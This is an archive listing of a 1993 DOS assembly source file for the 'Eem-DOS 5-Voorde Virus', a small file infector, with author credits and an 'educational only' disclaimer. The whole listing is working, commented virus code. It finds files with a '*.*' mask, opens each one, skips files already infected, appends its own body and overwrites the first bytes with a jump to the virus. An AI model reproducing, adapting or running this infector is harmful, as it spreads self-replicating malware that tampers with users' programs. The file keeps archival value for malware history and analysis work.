home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / SOURCE.ZIP / EEMVOOR1.ASM < prev    next >
Encoding:
Assembly Source File  |  1993-03-26  |  4.8 KB  |  124 lines
  1. ;                     The Eem-DOS 5-Voorde Virus
  2. ;
  3. ; Smallest COM file infector which works with te folowing principe:
  4. ;
  5. ; Before:
  6. ;    _____________________  ____________
  7. ;   [first 3 bytes of file][rest of file]
  8. ;
  9. ; After:
  10. ;    ____________  ___________________  _____________________
  11. ;   [jmp to virus][rest of file][virus][first 3 bytes of file]
  12. ;
  13. ; This way the virus can restore the first 3 bytes of the file so
  14. ; the file will still work.
  15. ;
  16. ; If you want no registers to change you can add some pushes, but
  17. ; it'll make the virus much larger.....
  18. ;
  19. ;       (C)1993 by [DαRkRαY] / TridenT
  20. ;
  21. ; BTW This is only a educational source, and this virus should not be
  22. ; spread, you may publish this file in it's original form.
  23. ; If you intend to spread this virus you will take all the responsibilities
  24. ; on youself so the author will not get into trubble.
  25. ; If you do not agree with this, destroy this file now.
  26. ;
  27. ; You can reach me by contacting Byte Hunter. at Hunter BBS (he's the sysop)
  28. ; +31-33-634415, and he'll get you in touch with me...
  29. ;
  30.  
  31. _CODE   SEGMENT
  32.         ASSUME  CS:_CODE
  33.  
  34.         ORG     100h
  35.  
  36.         LEN     EQU THE_END - VX                ; Length of this babe...
  37.  
  38. START:
  39.         DB      0E9h,0,0                        ; Jmp to virus
  40. VX:
  41.         CALL    RELATIVE                        ;
  42. RELATIVE:                                       ; Calculate relative offset
  43.         POP     BP                              ;
  44.         SUB     BP,OFFSET RELATIVE              ;
  45.  
  46.         MOV     DI,SI                           ; Make DI = 100h and save
  47.         PUSH    DI                              ; it as return point.
  48.  
  49.         LEA     SI,[BP + OLD_BYTES]             ;
  50.         MOV     CL,3                            ; Restore old first bytes.
  51.         REP     MOVSB                           ;
  52.  
  53.         MOV     DX,SI                           ; Set DX to filespec.
  54.         DEC     AX                              ; Make AX=-1
  55.  
  56. AGAIN:  ADD     AH,4Fh                          ;
  57.         INT     21h                             ; Search for file(s)
  58.         JNC     OK_1                            ; If non left exit.
  59.         RET                                     ;
  60. OK_1:
  61.         MOV     AH,3Eh                          ; Close old file, also nice
  62.         INT     21h                             ; anti-debug trick!!!!
  63.  
  64.         MOV     DI,SI                           ; Set DI to save old bytes
  65.         SUB     DI,3                            ;
  66.  
  67.         CALL    OPEN                            ; Open the victim
  68.  
  69.         MOV     AH,3Fh                          ; Save first 3 bytes
  70.         CALL    IO                              ;
  71.  
  72.         CMP     BYTE PTR [DI],0E9h              ; Is it allready infected?
  73.         JE      AGAIN                           ; If so, find next
  74.  
  75.         MOV     AX,4202h                        ;
  76.         XOR     CX,CX                           ; Set pointer to end of file
  77.         CWD                                     ;
  78.         INT     21h                             ;
  79.  
  80.         SUB     AX,3                            ;
  81.         ADD     DI,8                            ; Set jump to virus
  82.         MOV     WORD PTR DS:[DI],AX             ;
  83.  
  84.         MOV     AH,40h                          ;
  85.         MOV     CL,LEN                          ; Write virus
  86.         LEA     DX,[BP + VX]                    ;
  87.         INT     21h                             ;
  88.  
  89.         CALL    OPEN                            ; Open victim again
  90.  
  91.         MOV     AH,40h                          ;
  92.         DEC     DI                              ; Write jmp to virus
  93.         CALL    IO                              ;
  94.  
  95.         RET                                     ; Return to DOS
  96.  
  97. IO:
  98.         MOV     CL,3                            ;
  99.         MOV     DX,DI                           ; Read or write sub
  100.         INT     21h                             ;
  101.         RET                                     ;
  102.  
  103. OPEN:
  104.         MOV     AX,3D02h                        ;
  105.         MOV     DX,9Eh                          ; Open file in PSP for
  106.         INT     21h                             ; reading/writing
  107.         XCHG    BX,AX                           ;
  108.         RET                                     ;
  109.  
  110. OLD_BYTES:      NOP                             ;
  111.                 NOP                             ; Old first bytes of file
  112.                 RET                             ;
  113.  
  114. FILE_NAME:      DB      '*.*',0h                ; Infect all files.
  115.                                                 ; (and COM files will also
  116.                                                 ;  be infected....)
  117.  
  118. NEW_BYTES       DB      0E9h                    ; Jmp to virus
  119.  
  120. THE_END:                                        ; Bye Bye!
  121.  
  122. _CODE   ENDS
  123.         END     START
  124.